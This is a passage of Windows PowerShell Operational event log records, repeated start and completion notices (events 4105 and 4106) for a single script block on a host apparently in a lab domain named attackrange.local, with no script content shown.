SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468063
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468062
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468061
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468060
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468059
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468058
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468057
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468056
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468055
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468054
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468053
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468052
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468051
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468050
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468049
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468048
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468047
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468046
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468045
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468044
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468043
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468042
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468041
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468040
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468039
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468038
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468037
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468036
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468035
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468034
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468033
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468032
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468031
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468030
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468029
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468028
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468027
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468026
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468025
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468024
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468023
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468022
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468021
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468020
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468019
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468018
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468017
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468016
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468015
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468014
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468013
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468012
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468011
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468010
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468009
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:09 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468008
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
